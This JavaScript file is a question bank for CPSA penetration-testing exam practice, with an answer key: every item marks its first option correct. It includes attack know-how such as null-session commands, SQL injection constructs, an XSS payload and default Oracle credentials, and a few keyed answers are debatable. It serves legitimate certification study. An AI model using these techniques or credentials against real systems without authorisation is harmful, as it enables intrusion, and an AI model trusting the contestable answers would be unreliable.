// CPSA practice questions. Add/edit freely: {t:topic, q:question, o:[options], a:correct index, n:note}
const QUESTIONS = [
// ---- Ports & Services ----
{src:"Bank",t:"Ports & Services",q:"Which port is NOT related to a Microsoft service?",o:["111 (SunRPC)","445 (SMB)","1433 (MSSQL)","3389 (RDP)"],a:0,n:"111 is SunRPC/portmapper, a Unix service."},
{src:"Bank",t:"Ports & Services",q:"Which service listens on port 123?",o:["NTP","SNMP","NetBIOS","IKE"],a:0,n:"NTP = Network Time Protocol."},
{src:"Bank",t:"Ports & Services",q:"Port 161 is used by which service?",o:["SNMP","NTP","Syslog","LDAP"],a:0,n:"SNMP agent. 162 is SNMP traps."},
{src:"Bank",t:"Ports & Services",q:"Port 500 is used by which protocol?",o:["IKE","PPTP","RADIUS","L2TP"],a:0,n:"IKE (ISAKMP) for IPsec key exchange, UDP 500."},
{src:"Bank",t:"Ports & Services",q:"Port 1723 is used by?",o:["PPTP VPN","L2TP","IPsec","OpenVPN"],a:0,n:"PPTP control channel, TCP 1723."},
{src:"Bank",t:"Ports & Services",q:"Port 2049 is used by?",o:["NFS","SMB","AFP","iSCSI"],a:0,n:"NFS = Network File System."},
{src:"Bank",t:"Ports & Services",q:"Port 3128 is the default for?",o:["Squid proxy","Tor","SOCKS","HTTP"],a:0,n:"Squid caching proxy default."},
{src:"Bank",t:"Ports & Services",q:"Port 5900 is used by?",o:["VNC","RDP","X11","TeamViewer"],a:0,n:"VNC display :0 = 5900."},
{src:"Bank",t:"Ports & Services",q:"Port 6000 is used by?",o:["X11","VNC","RDP","SunRPC"],a:0,n:"X11 display :0 = 6000."},
{src:"Bank",t:"Ports & Services",q:"Port 9100 is used by?",o:["HP JetDirect (raw printing)","LPR","IPP","SNMP"],a:0,n:"JetDirect / raw socket printing."},
{src:"Bank",t:"Ports & Services",q:"Port 50000 is the default for which database?",o:["IBM DB2","Oracle","MySQL","MSSQL"],a:0,n:"DB2 instance default."},
{src:"Bank",t:"Ports & Services",q:"Which port is the MSSQL Browser/monitor service?",o:["1434 (UDP)","1433","3306","1521"],a:0,n:"1433 = MSSQL engine; 1434 = SQL Browser."},
{src:"Bank",t:"Ports & Services",q:"Microsoft Terminal Services (RDP) uses which port?",o:["3389","3388","3390","3306"],a:0,n:"RDP = TCP 3389."},
{src:"Bank",t:"Ports & Services",q:"NetBIOS Name Service uses which port?",o:["137","138","139","445"],a:0,n:"137 Name, 138 Datagram, 139 Session."},
{src:"Bank",t:"Ports & Services",q:"NetBIOS Session Service uses which port?",o:["139","137","138","445"],a:0,n:"139 = Session. 445 is SMB over TCP."},
{src:"Bank",t:"Ports & Services",q:"Port 512 is associated with which r-service?",o:["rexec","rlogin","rsh","rwho"],a:0,n:"512 rexec, 513 rlogin, 514 rsh/syslog."},
{src:"Bank",t:"Ports & Services",q:"Port 514 is associated with?",o:["syslog / rsh","rexec","rlogin","finger"],a:0,n:"UDP 514 syslog, TCP 514 rsh."},
{src:"Bank",t:"Ports & Services",q:"SIP on port 5060 uses which transport?",o:["Both TCP and UDP","TCP only","UDP only","SCTP only"],a:0,n:"SIP runs over both; 5061 is SIP-TLS."},
{src:"Bank",t:"Ports & Services",q:"Which is NOT a valid SIP method?",o:["HELLO","INVITE","BYE","OPTIONS"],a:0,n:"There is no HELLO; sessions end with BYE."},
{src:"Bank",t:"Ports & Services",q:"Stealthiest way to enumerate a SIP server?",o:["OPTIONS request","INVITE","REGISTER","SUBSCRIBE"],a:0,n:"OPTIONS probes capability without ringing phones."},
{src:"Bank",t:"Ports & Services",q:"RIP routing protocol uses which port/transport?",o:["UDP 520","TCP 179","UDP 521","TCP 89"],a:0,n:"RIP = UDP 520, clear-text auth. (179=BGP)"},
{src:"Bank",t:"Ports & Services",q:"Which services use .rhosts for authentication?",o:["rlogin, rsh, rexec","ssh, telnet, ftp","smtp, pop3, imap","nfs, smb, afp"],a:0,n:"The Berkeley r-services trust .rhosts / hosts.equiv."},
{src:"Bank",t:"Ports & Services",q:"Which SMTP commands are used to enumerate valid users?",o:["VRFY and EXPN","HELO and MAIL","RCPT and DATA","AUTH and STARTTLS"],a:0,n:"VRFY verifies a user; EXPN expands a mailing list."},
{src:"Bank",t:"Ports & Services",q:"Can TFTP list a directory's contents?",o:["No — TFTP has no directory listing","Yes, with ls","Yes, with dir","Yes, with get *"],a:0,n:"TFTP supports only GET/PUT of known filenames; no wildcards."},

// ---- Protocols & Layers ----
{src:"Bank",t:"Protocols & Layers",q:"SCTP operates at which OSI layer?",o:["4 – Transport","3 – Network","2 – Data Link","5 – Session"],a:0,n:"Stream Control Transmission Protocol is a transport protocol."},
{src:"Bank",t:"Protocols & Layers",q:"PPTP operates primarily at which OSI layer?",o:["2 – Data Link","4 – Transport","3 – Network","7 – Application"],a:0,n:"PPTP tunnels PPP frames at layer 2."},
{src:"Bank",t:"Protocols & Layers",q:"HTTP operates at which OSI layer?",o:["7 – Application","4 – Transport","6 – Presentation","3 – Network"],a:0,n:"HTTP is an application-layer protocol."},
{src:"Bank",t:"Protocols & Layers",q:"IP protocol number for ICMP?",o:["1","6","17","47"],a:0,n:"1=ICMP, 6=TCP, 17=UDP, 47=GRE."},
{src:"Bank",t:"Protocols & Layers",q:"IP protocol number for TCP?",o:["6","1","17","41"],a:0,n:"6=TCP."},
{src:"Bank",t:"Protocols & Layers",q:"IP protocol number for UDP?",o:["17","6","1","50"],a:0,n:"17=UDP."},
{src:"Bank",t:"Protocols & Layers",q:"IP protocol numbers for ESP and AH?",o:["50 and 51","51 and 50","47 and 50","1 and 6"],a:0,n:"ESP=50, AH=51 (IPsec)."},
{src:"Bank",t:"Protocols & Layers",q:"ICMP type 8 is which message?",o:["Echo Request","Echo Reply","Destination Unreachable","Redirect"],a:0,n:"Type 8 request; the reply is type 0."},
{src:"Bank",t:"Protocols & Layers",q:"An unfiltered host receives an ICMP type 8. What type is the reply?",o:["Type 0 (Echo Reply)","Type 8","Type 3","Type 11"],a:0,n:"Echo Request (8) → Echo Reply (0)."},

// ---- DNS ----
{src:"Bank",t:"DNS",q:"Which record is the opposite of an A record (maps IP → hostname)?",o:["PTR","MX","CNAME","SOA"],a:0,n:"A = name→IPv4; PTR = IPv4→name (reverse)."},
{src:"Bank",t:"DNS",q:"What does a DNS MX record identify?",o:["The mail server (host) for a domain","An IP → name mapping","An alias for another name","A zone's authority"],a:0,n:"MX points to the mail exchanger host."},
{src:"Bank",t:"DNS",q:"What is AXFR in DNS?",o:["A full zone transfer (replicates zone data)","A reverse lookup","A cache flush","A dynamic update"],a:0,n:"AXFR copies an entire zone between DNS servers."},
{src:"Bank",t:"DNS",q:"In 'domain.com IN SOA foo.domain.com. 64', what does foo.domain.com represent?",o:["Admin email (dot = @)","Primary nameserver","Serial number","Zone name"],a:0,n:"The 2nd SOA field is the admin mailbox with the first dot = @."},
{src:"Bank",t:"DNS",q:"A DNS zone represents…",o:["A boundary of administrative authority","A single record","A caching server","A TCP session"],a:0,n:"A zone is a portion of the namespace managed by an authority."},

// ---- Networking ----
{src:"Bank",t:"Networking",q:"How many TCP/UDP ports exist?",o:["65,536 (0–65535)","1,024","49,152","32,768"],a:0,n:"16-bit port field = 0–65535."},
{src:"Bank",t:"Networking",q:"Default TTL on Linux?",o:["64","128","255","32"],a:0,n:"Linux=64, Windows=128, Solaris/Cisco=255."},
{src:"Bank",t:"Networking",q:"Default TTL on Windows?",o:["128","64","255","32"],a:0,n:"Windows=128."},
{src:"Bank",t:"Networking",q:"Default TTL on Solaris?",o:["255","64","128","32"],a:0,n:"Solaris=255."},
{src:"Bank",t:"Networking",q:"Best indicator that two machines are the same physical host?",o:["Shared public IP address","Same TTL","Same OS","Same open port"],a:0,n:"A shared public IP strongly implies the same NAT/host."},
{src:"Bank",t:"Networking",q:"A host is 192.168.x.x with a /16 mask. What network class does the mask indicate?",o:["Class B","Class C","Class A","Class D"],a:0,n:"/16 (255.255.0.0) is the classful Class B mask, regardless of the address range."},
{src:"Bank",t:"Networking",q:"A subnet needing 128 addresses requires which CIDR?",o:["/25","/24","/26","/23"],a:0,n:"/25 = 128 addresses (126 usable)."},
{src:"Bank",t:"Networking",q:"/30 as a dotted-decimal subnet mask?",o:["255.255.255.252","255.255.255.248","255.255.255.240","255.255.255.128"],a:0,n:"/30 = 4 addresses, 2 usable (point-to-point)."},
{src:"Bank",t:"Networking",q:"Which address is a loopback?",o:["127.0.0.1","0.0.0.0","192.168.0.1","169.254.0.1"],a:0,n:"127.0.0.0/8 is loopback; 169.254 is APIPA."},
{src:"Bank",t:"Networking",q:"Which is a private (RFC 1918) range?",o:["192.168.0.0/24","8.8.8.0/24","172.15.0.0/16","11.0.0.0/8"],a:0,n:"Private: 10/8, 172.16–31/12, 192.168/16."},
{src:"Bank",t:"Networking",q:"Which protocol propagates VLAN configuration across switches?",o:["VTP","STP","CDP","HSRP"],a:0,n:"VLAN Trunking Protocol shares VLAN databases."},
{src:"Bank",t:"Networking",q:"Cisco-proprietary protocol for sharing directly-connected neighbour info?",o:["CDP","VTP","LLDP","BGP"],a:0,n:"Cisco Discovery Protocol (LLDP is the open equivalent)."},
{src:"Bank",t:"Networking",q:"An attack sending falsified ARP messages over a LAN is called?",o:["ARP spoofing","DNS poisoning","SYN flood","MAC flooding"],a:0,n:"Also called ARP poisoning."},
{src:"Bank",t:"Networking",q:"What is the result of successful ARP spoofing?",o:["Attacker's MAC is linked to a legitimate IP, so traffic is diverted","The victim's IP changes","The switch reboots","DNS records are altered"],a:0,n:"Enables MITM by binding attacker MAC to victim IP."},
{src:"Bank",t:"Networking",q:"The APIPA range is?",o:["169.254.0.0/16","127.0.0.0/8","192.168.0.0/16","10.0.0.0/8"],a:0,n:"Automatic Private IP Addressing when DHCP fails."},

// ---- Cryptography ----
{src:"Bank",t:"Cryptography",q:"Which is a public-key (asymmetric) algorithm?",o:["RSA","AES","DES","RC4"],a:0,n:"RSA is asymmetric; the others are symmetric."},
{src:"Bank",t:"Cryptography",q:"A Cisco type 7 password is protected with?",o:["A reversible XOR (very weak)","MD5","SHA-256","bcrypt"],a:0,n:"Type 7 is trivially reversible."},
{src:"Bank",t:"Cryptography",q:"Recommended (strongest) Cisco password type?",o:["Type 9 (scrypt)","Type 7","Type 5 (MD5)","Type 4"],a:0,n:"Type 9 = scrypt; Type 8 = PBKDF2."},
{src:"Bank",t:"Cryptography",q:"A 40-hex-character (20-byte) hash is produced by?",o:["SHA-1","MD5","SHA-256","NTLM"],a:0,n:"SHA-1 = 160 bits = 20 bytes = 40 hex chars."},
{src:"Bank",t:"Cryptography",q:"A 32-hex-character (16-byte) hash is produced by?",o:["MD5","SHA-1","SHA-256","bcrypt"],a:0,n:"MD5 = 128 bits = 16 bytes = 32 hex chars."},
{src:"Bank",t:"Cryptography",q:"A shadow-file hash beginning $1$ uses which algorithm?",o:["MD5 (salted)","DES","SHA-256","bcrypt"],a:0,n:"$1=MD5, $2=bcrypt, $5=SHA-256, $6=SHA-512."},
{src:"Bank",t:"Cryptography",q:"Maximum password length in a single LANMAN hash?",o:["14 characters","8","16","7"],a:0,n:"14 chars, split into two 7-char halves, uppercased, no salt."},
{src:"Bank",t:"Cryptography",q:"Main weakness of LANMAN hashes?",o:["Easily cracked (split into two 7-char halves, no salt)","Too slow","Uses AES","Salted twice"],a:0,n:"Splitting + uppercasing shrinks the keyspace enormously."},
{src:"Bank",t:"Cryptography",q:"Does PGP use symmetric or asymmetric encryption?",o:["Both (hybrid)","Symmetric only","Asymmetric only","Neither"],a:0,n:"Asymmetric to exchange a symmetric session key."},
{src:"Bank",t:"Cryptography",q:"Which are the core components of IPsec?",o:["AH, ESP, IKE","SSL, TLS, HTTPS","AES only","PPTP, L2TP"],a:0,n:"Authentication Header, Encapsulating Security Payload, Internet Key Exchange."},
{src:"Bank",t:"Cryptography",q:"Strongest block cipher mode of those listed?",o:["GCM","CBC","CTR","ECB"],a:0,n:"GCM adds authentication; ECB is the weakest (patterns leak)."},
{src:"Bank",t:"Cryptography",q:"DES block size?",o:["64-bit","128-bit","56-bit","168-bit"],a:0,n:"DES block=64, key=56 effective."},
{src:"Bank",t:"Cryptography",q:"AES block size?",o:["128-bit","64-bit","256-bit","192-bit"],a:0,n:"AES block is always 128; key can be 128/192/256."},
{src:"Bank",t:"Cryptography",q:"3DES effective key size?",o:["168-bit","56-bit","128-bit","256-bit"],a:0,n:"Three 56-bit DES keys = 168 bits."},
{src:"Bank",t:"Cryptography",q:"RC4 is what kind of cipher?",o:["Symmetric stream cipher","Asymmetric","Block cipher","Hash function"],a:0,n:"RC4 = Rivest Cipher 4, a stream cipher (used in WEP)."},

// ---- Windows / Linux ----
{src:"Bank",t:"Windows/Linux",q:"In Linux, which top-level directory holds logs (/…/log)?",o:["/var","/etc","/usr","/opt"],a:0,n:"/var/log holds system logs."},
{src:"Bank",t:"Windows/Linux",q:"Where is the Windows SAM file stored?",o:["C:\\Windows\\System32\\config\\SAM","C:\\Windows\\System32\\SAM","C:\\SAM","C:\\Windows\\SAM"],a:0,n:"…\\System32\\config\\SAM (locked while running)."},
{src:"Bank",t:"Windows/Linux",q:"How do you list installed hotfixes in Windows?",o:["Get-Hotfix (or wmic qfe list)","Get-Patch","showrev -p","rpm -qa"],a:0,n:"Get-Hotfix / 'wmic qfe list full'."},
{src:"Bank",t:"Windows/Linux",q:"How do you show missing patches on Solaris?",o:["showrev -p","patchadd -p","rpm -qa","yum list"],a:0,n:"'showrev -p' lists installed patches."},
{src:"Bank",t:"Windows/Linux",q:"Risk of adding sbin directories to a normal user's $PATH?",o:["Users can invoke administrator binaries","It breaks login","No effect","It slows the shell"],a:0,n:"sbin holds privileged system binaries."},
{src:"Bank",t:"Windows/Linux",q:"Which RID identifies the built-in Windows Administrator account?",o:["500","501","1000","512"],a:0,n:"RID 500 = Administrator, 501 = Guest, 1000+ = normal users."},
{src:"Bank",t:"Windows/Linux",q:"How many FSMO roles exist in Active Directory?",o:["5","3","7","2"],a:0,n:"Schema, Domain Naming, RID, PDC Emulator, Infrastructure."},
{src:"Bank",t:"Windows/Linux",q:"Command to list AD FSMO role holders?",o:["netdom query fsmo","dsquery fsmo","netstat -f","gpresult /fsmo"],a:0,n:"'netdom query fsmo' (not dsquery)."},
{src:"Bank",t:"Windows/Linux",q:"IIS 7 shipped with which Windows version?",o:["Windows Vista / Server 2008","Windows 2000","Windows Server 2012","Windows XP"],a:0,n:"IIS 5=2000, 6=2003, 7=Vista/2008, 8.5=2012 R2."},
{src:"Bank",t:"Windows/Linux",q:"IIS 5 shipped with which Windows version?",o:["Windows 2000","Windows XP","Windows Server 2008","Windows Server 2003"],a:0,n:"IIS 5 = Windows 2000."},
{src:"Bank",t:"Windows/Linux",q:"NetBIOS suffix 0x00 identifies which service?",o:["Workstation service","Server (file sharing) service","Domain controller","Messenger"],a:0,n:"<00>=Workstation, <20>=Server service."},
{src:"Bank",t:"Windows/Linux",q:"NetBIOS suffix 0x20 identifies which service?",o:["Server / file-sharing service","Workstation","Master browser","Domain controller"],a:0,n:"<20> = File Server (Server) service."},
{src:"Bank",t:"Windows/Linux",q:"Which command shows Master Browser status?",o:["browstat status","nbtstat -A","netstat -b","net view"],a:0,n:"browstat is the Browser Service diagnostic tool."},
{src:"Bank",t:"Windows/Linux",q:"A tool reports '..__MSBROWSE__.'. What does this indicate?",o:["The machine is a Master Browser","It is a domain controller","It is a DNS server","It is a print server"],a:0,n:"__MSBROWSE__ marks the segment's Master Browser."},

// ---- Tools & Output ----
{src:"Bank",t:"Tools & Output",q:"In FTP PORT command '10,1,10,2,10,10', which part is the IP address?",o:["First four numbers → 10.1.10.2","Last two numbers","All six","First two"],a:0,n:"First 4 octets = IP, last 2 = port."},
{src:"Bank",t:"Tools & Output",q:"In the FTP PORT command, how is the port derived from the last two numbers?",o:["(first × 256) + second","Concatenate them","Convert to hex","Add them"],a:0,n:"e.g. 10,10 → (10×256)+10 = 2570."},
{src:"Bank",t:"Tools & Output",q:"Which tool traces system calls on Solaris?",o:["truss","strace","ltrace","dtrace"],a:0,n:"Solaris=truss; Linux=strace."},
{src:"Bank",t:"Tools & Output",q:"Which tool traces system calls on Linux?",o:["strace","truss","tcpdump","netstat"],a:0,n:"strace traces syscalls & signals."},
{src:"Bank",t:"Tools & Output",q:"Which find command matches a filename case-insensitively?",o:["find . -type f -iname '*.pdf'","find . -type f -name '*.pdf'","find . -regex '*.pdf'","find . -path '*.pdf'"],a:0,n:"-iname ignores case; -name is case-sensitive."},

// ---- Vulnerabilities & Attacks ----
{src:"Bank",t:"Vulns & Attacks",q:"Which SQL construct is used to pull data from other tables in a SQLi?",o:["UNION SELECT","SELECT ALL","JOIN ALL","MERGE"],a:0,n:"UNION SELECT appends attacker-chosen columns."},
{src:"Bank",t:"Vulns & Attacks",q:"Which function is typically used in blind/time-based SQLi?",o:["SLEEP()","COUNT()","NOW()","CONCAT()"],a:0,n:"Delays confirm true/false conditions blindly."},
{src:"Bank",t:"Vulns & Attacks",q:"Shellshock is a vulnerability in?",o:["GNU Bash (< 4.3)","OpenSSL","OpenSSH","Apache"],a:0,n:"CVE-2014-6271, function definitions in env vars."},
{src:"Bank",t:"Vulns & Attacks",q:"Which PHP function most directly enables remote code execution?",o:["eval()","echo()","isset()","print()"],a:0,n:"eval() executes a string as PHP."},
{src:"Bank",t:"Vulns & Attacks",q:"Which PHP functions enable file inclusion attacks?",o:["include() and require()","fopen()","echo()","header()"],a:0,n:"LFI/RFI via include/require of attacker-controlled paths."},
{src:"Bank",t:"Vulns & Attacks",q:"A hosts.equiv file containing only '+' does what?",o:["Allows any host to log in as any user (except root)","Blocks all logins","Logs all logins","Allows only localhost"],a:0,n:"The '+' wildcard trusts everyone — very dangerous."},
{src:"Bank",t:"Vulns & Attacks",q:"'net use \\\\<ip>\\IPC$ \"\" /u:\"\"' performs what?",o:["A null session connection","A brute-force attack","A share mount with credentials","An RDP session"],a:0,n:"Anonymous IPC$ session for enumeration."},
{src:"Bank",t:"Vulns & Attacks",q:"A null-session attack cycling SIDs/RIDs to enumerate accounts is called?",o:["RID cycling","Password spraying","Kerberoasting","Pass-the-hash"],a:0,n:"Increment the RID to resolve each account name."},
{src:"Bank",t:"Vulns & Attacks",q:"The IIS Unicode (directory traversal) attack allows?",o:["Arbitrary command execution","Denial of service only","Reflected XSS","Information disclosure only"],a:0,n:"Encoded '../' escapes the web root to run commands."},
{src:"Bank",t:"Vulns & Attacks",q:"Why does the payload <script>alert \"xss\"</script> fail?",o:["alert is missing parentheses, so it isn't a function call","script tags are stripped","Quotes are invalid","It needs a semicolon"],a:0,n:"'alert \"xss\"' is a syntax error; it must be alert('xss')."},
{src:"Bank",t:"Vulns & Attacks",q:"Why enable mod_security on Apache?",o:["It's a WAF protecting against SQLi and XSS","It speeds up TLS","It compresses responses","It manages sessions"],a:0,n:"ModSecurity is a web application firewall."},
{src:"Bank",t:"Vulns & Attacks",q:"Which application type is LEAST susceptible to buffer overflows?",o:["Java application (managed memory)","C program","C++ program","Assembly routine"],a:0,n:"The JVM enforces bounds checking and memory safety."},

// ---- Databases ----
{src:"Bank",t:"Databases",q:"Default administrative user for MSSQL?",o:["sa","admin","root","dbo"],a:0,n:"'sa' = system administrator."},
{src:"Bank",t:"Databases",q:"Query to get the MSSQL version?",o:["SELECT @@VERSION","SELECT v$version","SELECT VERSION()","SHOW VERSION"],a:0,n:"@@VERSION works on MSSQL (and MySQL)."},
{src:"Bank",t:"Databases",q:"Query to get the Oracle version?",o:["SELECT * FROM v$version","SELECT @@VERSION","SELECT VERSION()","SHOW VERSION"],a:0,n:"Oracle exposes v$version."},
{src:"Bank",t:"Databases",q:"Query to get the MySQL version?",o:["SELECT VERSION()","SELECT v$version","SELECT * FROM version","SHOW VER"],a:0,n:"VERSION() or @@version."},
{src:"Bank",t:"Databases",q:"Default password for Oracle user SCOTT?",o:["TIGER","MANAGER","ORACLE","SCOTT"],a:0,n:"The classic SCOTT/TIGER demo account."},
{src:"Bank",t:"Databases",q:"Default password for Oracle user SYS?",o:["CHANGE_ON_INSTALL","MANAGER","TIGER","ORACLE"],a:0,n:"SYS/CHANGE_ON_INSTALL, SYSTEM/MANAGER."},
{src:"Bank",t:"Databases",q:"Logged in as the Oracle DBSNMP user, what can you do?",o:["Access performance metrics / monitoring data","Full DBA control","Create any user","Drop system tables"],a:0,n:"DBSNMP is the monitoring account."},

// ---- Wireless ----
{src:"Bank",t:"Wireless",q:"How many versions of WPA exist?",o:["3 (WPA, WPA2, WPA3)","2","4","1"],a:0,n:"WPA, WPA2, WPA3."},
{src:"Bank",t:"Wireless",q:"Length of the IV in a WEP key?",o:["24 bits","40 bits","64 bits","128 bits"],a:0,n:"24-bit IV — too short, causes reuse (weakness)."},
{src:"Bank",t:"Wireless",q:"Secret key length in original 64-bit WEP?",o:["40 bits","24 bits","64 bits","104 bits"],a:0,n:"40-bit key + 24-bit IV = 64-bit WEP."},
{src:"Bank",t:"Wireless",q:"Most secure WPA configuration uses which cipher?",o:["AES (WPA2/WPA3; WPA3 adds SAE)","TKIP","RC4","DES"],a:0,n:"WPA3 adds SAE (Dragonfly) over WPA2-AES."},
{src:"Bank",t:"Wireless",q:"WPA (v1) introduced which encryption improvement over WEP?",o:["TKIP","AES","RC4","DES"],a:0,n:"TKIP added per-packet keying; WPA2 moved to AES-CCMP."},
{src:"Bank",t:"Wireless",q:"What is the fundamental cause of WEP's weakness?",o:["RC4 with a short, reused 24-bit IV","MD5 collisions","Weak DES keys","No password hashing"],a:0,n:"IV reuse in RC4 lets keystream be recovered."},
{src:"Bank",t:"Wireless",q:"802.11a operates on which frequency band?",o:["5 GHz","2.4 GHz","900 MHz","60 GHz"],a:0,n:"802.11a = 5 GHz."},
{src:"Bank",t:"Wireless",q:"802.11b operates on which frequency band?",o:["2.4 GHz","5 GHz","900 MHz","60 GHz"],a:0,n:"802.11b = 2.4 GHz, 11 Mbps."},
{src:"Bank",t:"Wireless",q:"802.11g operates on which frequency band?",o:["2.4 GHz","5 GHz","900 MHz","60 GHz"],a:0,n:"802.11g = 2.4 GHz, 54 Mbps."},
{src:"Bank",t:"Wireless",q:"IEEE 802.15 refers to which technology?",o:["Bluetooth / WPAN (2.4 GHz)","Wi-Fi","Ethernet","Cellular"],a:0,n:"802.15 = Wireless Personal Area Networks (Bluetooth)."},

// ---- Law & Compliance ----
{src:"Bank",t:"Law & Compliance",q:"Which UK act criminalises unauthorised access to computer material?",o:["Computer Misuse Act 1990","Data Protection Act 1998","Human Rights Act 1998","GDPR"],a:0,n:"CMA 1990 is the core UK hacking offence."},
{src:"Bank",t:"Law & Compliance",q:"Computer Misuse Act 1990 Section 1 covers?",o:["Unauthorised access to computer material","Denial of service","Data theft","Copyright"],a:0,n:"S1 basic access; S2 with intent; S3 impairing operation."},
{src:"Bank",t:"Law & Compliance",q:"Which act amended the CMA to make DoS attacks explicitly illegal?",o:["Police and Justice Act 2006","Data Protection Act 1998","Human Rights Act 1998","RIPA 2000"],a:0,n:"It updated CMA Section 3."},
{src:"Bank",t:"Law & Compliance",q:"Before testing a client's systems you must have?",o:["Written permission and a defined scope","Verbal approval","Nothing, if defensive","A signed NDA only"],a:0,n:"Written authorisation and scope keep you the right side of the CMA."},
{src:"Bank",t:"Law & Compliance",q:"Section 55 of the Data Protection Act 1998 concerns?",o:["Unlawfully obtaining personal data","Breach notification","Encryption standards","Data retention limits"],a:0,n:"S55 makes unlawful obtaining/disclosure an offence."},

// ---- Consulting ----
{src:"Bank",t:"Consulting",q:"If a client notices the pen test is disrupting their network, they should?",o:["Inform you (the tester) as soon as they realise","Wait until the test ends","Reboot everything","Ignore it"],a:0,n:"Fast communication limits impact."},
{src:"Bank",t:"Consulting",q:"Primary concern when performing application testing?",o:["Unintended disruption of business and services","Test duration","Report length","Tool licensing"],a:0,n:"Avoid impacting live business operations."},
{src:"Bank",t:"Consulting",q:"Which models are used to rate/determine the severity of a threat?",o:["STRIDE and CVSS","DREAD only","OWASP Top 10","MITRE ATT&CK"],a:0,n:"CVSS scores severity; STRIDE categorises threats."},

// ---- Other Technology ----
{src:"Bank",t:"Other Tech",q:"Most secure X Windows authentication method?",o:["SSH tunnelling","xhost +","MIT-magic-cookie","No auth"],a:0,n:"Forward X over SSH rather than exposing the X server."},
{src:"Bank",t:"Other Tech",q:"What can an attacker do against an unrestricted X server?",o:["Take screenshots and control keyboard/mouse","Only read files","Nothing","Only crash it"],a:0,n:"Full display capture and input injection."},
{src:"Bank",t:"Other Tech",q:"Small Java programs that run in a browser are called?",o:["Applets","Servlets","Beans","Scriptlets"],a:0,n:"Applets ran client-side (now deprecated)."},
{src:"Bank",t:"Other Tech",q:"Which config files control TCP Wrappers?",o:["hosts.allow and hosts.deny","iptables.conf","xinetd.conf","/etc/services"],a:0,n:"Allow/deny host-based access to wrapped services."},
{src:"Bank",t:"Other Tech",q:"In a MAC address, what do the first 3 bytes (OUI) identify?",o:["The manufacturer","The device serial","The VLAN","The region"],a:0,n:"OUI = Organisationally Unique Identifier (vendor)."},
{src:"Bank",t:"Other Tech",q:"Which HTTP headers were historically used for cache control?",o:["Pragma and Cache-Control (no-cache)","Host and Referer","ETag and Age","Accept and Cookie"],a:0,n:"Pragma: no-cache is the legacy directive."},
{src:"Bank",t:"Other Tech",q:"HTTP status code for 'Forbidden'?",o:["403","401","302","404"],a:0,n:"403 Forbidden. (401=Unauthorized, 302=redirect, 404=Not Found.)"},

// ================= Second batch: full Tips cheat-sheet =================

// ---- Acronyms ----
{src:"Tips",t:"Acronyms",q:"HSRP stands for?",o:["Hot Standby Router Protocol","High Speed Routing Protocol","Host Standby Recovery Protocol","Hardware Security Router Protocol"],a:0,n:"Cisco first-hop redundancy protocol."},
{src:"Tips",t:"Acronyms",q:"BGP stands for?",o:["Border Gateway Protocol","Backbone Gateway Protocol","Basic Gateway Protocol","Bridge Group Protocol"],a:0,n:"The Internet's inter-AS routing protocol (TCP 179)."},
{src:"Tips",t:"Acronyms",q:"TACACS stands for?",o:["Terminal Access Controller Access-Control System","Trusted Access Control And Config Service","Terminal Auth Control And Cipher System","Token Access Control Authentication System"],a:0,n:"AAA protocol; TACACS+ is the Cisco version."},
{src:"Tips",t:"Acronyms",q:"HMAC stands for?",o:["Hash-based Message Authentication Code","Hardware Media Access Control","Hybrid Message Auth Cipher","Host Machine Access Control"],a:0,n:"Keyed hash for message integrity/authentication."},
{src:"Tips",t:"Acronyms",q:"SCADA stands for?",o:["Supervisory Control and Data Acquisition","Secure Control And Data Access","System Control And Device Automation","Standard Control And Data Architecture"],a:0,n:"Industrial control systems."},
{src:"Tips",t:"Acronyms",q:"CCMP (WPA2) stands for?",o:["Counter Mode CBC-MAC Protocol","Cipher Chain Message Protocol","Counter Cipher Mode Protocol","Cyclic CBC MAC Protocol"],a:0,n:"AES-based, replaced TKIP in WPA2."},
{src:"Tips",t:"Acronyms",q:"ISAKMP stands for?",o:["Internet Security Association and Key Management Protocol","Internet Secure Auth Key Mgmt Protocol","IPsec Security And Key Mgmt Protocol","Internet Session And Key Mgmt Protocol"],a:0,n:"Framework used by IKE for IPsec SAs."},
{src:"Tips",t:"Acronyms",q:"SIEM stands for?",o:["Security Information and Event Management","System Intrusion & Event Monitor","Secure Internet Event Manager","Security Incident & Escalation Model"],a:0,n:"Log aggregation + correlation for detection."},
{src:"Tips",t:"Acronyms",q:"UTM (network appliance) stands for?",o:["Unified Threat Management","Universal Traffic Monitor","Unified Transport Module","User Terminal Manager"],a:0,n:"All-in-one FW/IPS/AV/filter appliance."},
{src:"Tips",t:"Acronyms",q:"SAM (Windows) stands for?",o:["Security Accounts Manager","System Access Module","Secure Auth Manager","Session Account Map"],a:0,n:"Stores local user password hashes."},
{src:"Tips",t:"Acronyms",q:"'GWS' in an HTTP Server header indicates which web server?",o:["Google Web Server","Generic Web Service","Gateway Web Server","GNU Web Server"],a:0,n:"GWS = Google; Websphere = IBM."},

// ---- Cryptography (algorithms, sizes, Cisco types) ----
{src:"Tips",t:"Cryptography",q:"Which of these is a SYMMETRIC algorithm?",o:["Blowfish","RSA","ElGamal","ECC"],a:0,n:"Symmetric: DES/3DES, AES, Blowfish, Twofish, Serpent, IDEA, RC4/5/6, CAST."},
{src:"Tips",t:"Cryptography",q:"Which of these is an ASYMMETRIC algorithm?",o:["Diffie-Hellman","AES","Twofish","IDEA"],a:0,n:"Asymmetric: RSA, ElGamal, ECC, Diffie-Hellman, Paillier, Merkle-Hellman."},
{src:"Tips",t:"Cryptography",q:"Diffie-Hellman is primarily used for?",o:["Key exchange","Bulk encryption","Hashing","Digital signatures only"],a:0,n:"DH establishes a shared secret over an insecure channel."},
{src:"Tips",t:"Cryptography",q:"DES key size (effective)?",o:["56-bit","64-bit","128-bit","168-bit"],a:0,n:"56-bit key, 64-bit block."},
{src:"Tips",t:"Cryptography",q:"RSA key sizes typically range?",o:["1024–4096 bits","40–256 bits","56–168 bits","128–512 bits"],a:0,n:"RSA 1024–4096 bit keys."},
{src:"Tips",t:"Cryptography",q:"RC4 key size range?",o:["40–2048 bits","56 bits fixed","128–256 bits","1024–4096 bits"],a:0,n:"RC4 is a variable-key stream cipher."},
{src:"Tips",t:"Cryptography",q:"MD5 digest size?",o:["128 bits","160 bits","256 bits","512 bits"],a:0,n:"MD5 = 128-bit digest, 512-bit block."},
{src:"Tips",t:"Cryptography",q:"SHA-1 digest size?",o:["160 bits","128 bits","256 bits","512 bits"],a:0,n:"SHA-1 = 160 bits = 40 hex chars."},
{src:"Tips",t:"Cryptography",q:"How many hex characters is a SHA-256 hash?",o:["64","40","32","128"],a:0,n:"SHA-256 = 32 bytes = 64 hex; SHA-512 = 128 hex."},
